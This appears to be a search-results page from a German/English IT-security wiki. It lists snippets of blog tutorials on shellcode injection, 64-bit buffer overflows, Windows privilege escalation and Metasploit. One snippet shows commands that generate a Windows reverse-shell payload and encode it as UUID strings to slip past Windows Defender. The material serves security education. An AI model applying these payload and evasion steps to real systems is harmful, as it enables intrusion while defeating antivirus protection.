Search
You can find the results of your search below.
Matching pagenames:
Fulltext results:
- Shellcode Injection Part 4 @en:it-security:blog
- of ''calc.exe'' on a Windows computer * 64-bit code * Avoid null bytes ===== Preparations ===== =... t from [[https://www.ired.team/offensive-security/code-injection-process-injection/finding-kernel32-base... e used for the structure of the shellcode. ===== Code: Step by step ===== You can also find the complete code on [[https://github.com/psycore8/nosoc-shellcode/
- Buffer overflow in the 64-bit stack - Part 3 @en:it-security:blog
- ssue a system command when calling the function <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Dependencies ===== * socat mod [[... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
- Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog
- 80568|kompilierte debug binary]] from the blog. <code bash> br *vuln+73 # setze Breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Dependencies ===== What is needed? ... fer_overflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deactivate ASLR ===== ASLR must also be deactivated
- Obfuscation: Disguise shellcode as UUIDs @en:it-security:blog
- This is usually recognised by Windows Defender. <code bash> python shencode.py create -c="-p windows/x6... T=IPADDRESS LPORT=PORT -f raw -o shell_rev.raw" </code> ==== encode ==== We now encode this payload as UUID strings. <code bash> python shencode.py encode -f shell_rev.raw -u </code> The output now looks something like this: <cod
- Host Discovery with Metasploit database @en:it-security
- se and set up a user with access rights for it. <code bash> root@kali:~# msfdb init Creating database u... g/database.yml Creating initial database schema </code> ===== Metasploit: Connect database ===== <code ruby> msf6 > db_connect user:pass@127.0.0.1/db_name </code> ==== Check connection ==== <code ruby> msf6 >
- Linux Commands Cheatsheet @en:linux
- untuusers.de/Systemzeit/)) ==== show time ==== <code bash> timedatectl </code> ==== change time ==== Set time zone manually <code bash> sudo timedatectl set-timezone Europe/Berlin </code> Select time zone <code bash> sudo dpkg-reconfi
- Privilege escalation: Windows admin thanks to Linux @en:it-security:blog
- ntpw ==== Now we can install ''chntpw'' using: <code bash> sudo apt install chntpw </code> \\ \\ ==== Find Windows partition ==== We are looking for the Windows partition. <code bash> sudo sfdisk -l </code> {{it-security:blog:screenshot_2024-03-14_145734.png|}} \\ \\ In our examp
- 64-Bit Stack CheatSheet @en:it-security
- change them, it must save them on the stack with <code asm>push</code> to save them on the stack. Before returning to the function, these registers must then be restored using <code asm>pop</code> to restore these registers. More on this can be found in the Cheat-Sheet((https://cs.br